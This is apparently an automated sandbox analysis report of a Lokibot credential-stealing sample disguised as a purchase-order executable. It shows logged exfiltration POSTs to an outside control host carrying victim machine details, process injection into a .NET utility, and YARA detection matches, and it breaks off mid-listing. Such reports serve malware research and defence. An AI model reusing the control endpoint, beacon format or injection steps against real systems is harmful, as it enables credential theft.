Oct 24, 2024 17:03:49.446890116 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZpP48vVEFaoIJXmJweJdMcqvE32HQne95DJ4%2BpbCorqz19Rdm9FHDeKInDttE5ENIbtztiJFigyEfLTykX7Jo1yXON2Gd0nHrUYH%2BNusi6LJTXSuwysaIqIWt%2BbjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb045dfbe7df-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2058&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50041	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:49.599083900 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:49.605447054 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:51.258519888 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWa4g5hds29eH2hu8idLkFWYdOYJE7ClKfa96z%2BbHnfAUM5dtw2%2FzF%2FIn786%2BtGTFK6YsLkdO4XzbPVTXrxsDjLrDuDrP5LNm3Wpnsvk6rkNzY1ES3h2FITneWSmxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb1a5859e7aa-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50042	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:51.414366961 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:51.419744015 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:52.944350958 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mthHisWz0XpCVOYwRB6iqtkAod4n7LnHPrMwsnF5yo2DlqlDh7Bs4xkcBH4czccZXvNZ0CcLCGAWZmptILSpN0FCYwOP%2FaFRUv6KJCSqc61Q5NqSnrFlvmEs2WPqEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb25c9bfe9b1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50043	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:53.086359978 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:53.091767073 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:56.758740902 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJfa1hiYNLN1jWlhq%2FqZLFUFkOHcKKD%2BBvBDW0pOAmL%2BE0YmUkcrXFRhmmU0vMUgyf41AvGxIGg2VsGSFPciVz64V5bKAlRPXC%2FHTK%2B5vheCwqvDaJ86kfO5R6KMwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb302dbaeb2f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50044	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:56.911874056 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:56.917337894 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:58.361933947 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNqxsd1pUSYqptvMagBIhW9j9rA0LVQyajgvXmU2jWsUPUaK3UyzBM1MSPU10pBUhsnguEel%2FS9Lfc4Xly3DEE0pcm%2BUuqhbA6o4q54gk%2FlRlclmNknMuZ7mQICBFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb481d716b1d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50045	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:58.507231951 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:58.513506889 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:04:03.634898901 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:04:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D69zyd2CmaCqyBI00eXhuBCNz1HQRQgyhCJkeShuBfNuQ5%2F8qpc%2BJxTm4qdwsSDjMBFgcuyIioTs7ci0fARwHieEMjUBmW8ebSZ7VKYMgUOaAIxPKxXFuW4oWC%2BaWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb521f52e9ca-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2231&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50046	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:04:03.801635981 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:04:03.807044029 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:04:04.695522070 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:04:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNYo7VG3OL66n7smhCPctkTkmvWh6szOKNrT0SGzHaDYrAQtqbk6QL4VfOyd1%2B1KQBnoGvzVNfKIVjtOFnSSmSQUZUXvrNbBTiMDWsEHpkTGvW7UQ9xDTiTMMtJuug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb731faa6b51-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50047	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:04:04.863425970 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:04:04.868949890 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:04:06.227567911 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:04:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTIu3Xa9n%2FRNYYgxgBO1owPFBvIZrGWUg%2BEKFWBmKougVFgHZuTwrvrC9AC974qF0bXnRV4%2FKnoCDwrAz73xAd0JYIvMBJ%2BcNFzbk6g%2FT%2BJuBlhngNIuWeh5LOLvzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb79cade474a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50048	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:04:06.389303923 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:04:06.395714998 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:04:07.730067968 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:04:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMYPnjzitArtv%2BpXSPf1c%2BvhKrzavh9oSC5vxt8Vsn73nAzg48C%2B2Ug3GtAAwizAOLB%2Fq9FtaSU%2FBvVHyzyMJc%2FZ3parcBlPk0ijTuy8dVpp0hmRwkwEI7m18CrVmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adb836f1fea0a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	11:02:02
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe"
Imagebase:	0xc40000
File size:	474'112 bytes
MD5 hash:	13A22D03A02D5BA40E7865B1595DB7A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:02:05
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x9c0000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	35
Total number of Limit Nodes:	2

Executed Functions

Function 014DE498 Relevance: 3.9, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gnP~, xrefs: 014DE609
nWc, xrefs: 014DE5DC
gnP~, xrefs: 014DE602

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID: gnP~$gnP~$nWc
API String ID: 0-1571174616
Opcode ID: f7f82d0d48cc90d3b5c0c02c092762d00d4ecfb6b50206ebe1f09c124abd2578
Instruction ID: 2d1f70ed631d360565eda5e1d6cbaa3981932a1cfd8fe1c5dd61882223d11bf5
Opcode Fuzzy Hash: f7f82d0d48cc90d3b5c0c02c092762d00d4ecfb6b50206ebe1f09c124abd2578
Instruction Fuzzy Hash: 2D4147B4D0521ACFDF44CFAAD4546EEFBB1EB49300F14942AD425BB260D3389642CF65

Function 02F20006 Relevance: 1.8, APIs: 1, Instructions: 259
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F2021F

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 405e8403bf393b08956965fc2da4442fb4a1e3326134139058b8bbad2fb5ad5f
Instruction ID: 73419561bcf5981697d46f36fb2eabb87db76c3e88d147cf41b5bdc31d06f677
Opcode Fuzzy Hash: 405e8403bf393b08956965fc2da4442fb4a1e3326134139058b8bbad2fb5ad5f
Instruction Fuzzy Hash: 8A91F275C042699FCB25CFA8C850BDDBBB1AF1A304F0490EAE548B7261DB749A89CF54

Function 02F20040 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F2021F

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eee6896c612db332cb38c620ea3554a10ef66ce9f66802d1eff84af05c73ed71
Instruction ID: 1daa4e738b2d7242e77468c4ef3102c00719732933676b6c1bba7462418c00de
Opcode Fuzzy Hash: eee6896c612db332cb38c620ea3554a10ef66ce9f66802d1eff84af05c73ed71
Instruction Fuzzy Hash: 1B81C075C0022DDFDB25CFA8D944BDDBBB5AF19304F0090AAE548B7260DB749A89CF54

Function 02F206A0 Relevance: 1.6, APIs: 1, Instructions: 112
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20776

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4a17966b9b8d17a54a19dc7bce00191208409b4376a86e36954f607f1868571d
Instruction ID: 83f7d134054fcfa9dcd8ac1e57f71a9b925e04e2234490e192cee600fc7d9b85
Opcode Fuzzy Hash: 4a17966b9b8d17a54a19dc7bce00191208409b4376a86e36954f607f1868571d
Instruction Fuzzy Hash: 33418BB5D002589FCF00CFA9D984ADEFBF1BB19314F24902AE918B7210D335AA45CF64

Function 02F206A8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20776

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2455a77aea730116332472e03ac66a91ba02eb72b731eabf9251a2e15980466b
Instruction ID: 2abcedf41a88f6b1182bd9b66cb791b9339dc78df870ab75530f7a4aeee628b0
Opcode Fuzzy Hash: 2455a77aea730116332472e03ac66a91ba02eb72b731eabf9251a2e15980466b
Instruction Fuzzy Hash: 0B4169B9D002589FCB00CFA9D984ADEFBF5BB19314F24902AE918B7250D375AA45CF64

Function 02F20481 Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20535

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d733b34583264eb0dc79a5db73e964b3b140a5a08ff49496ac72216cabdc8321
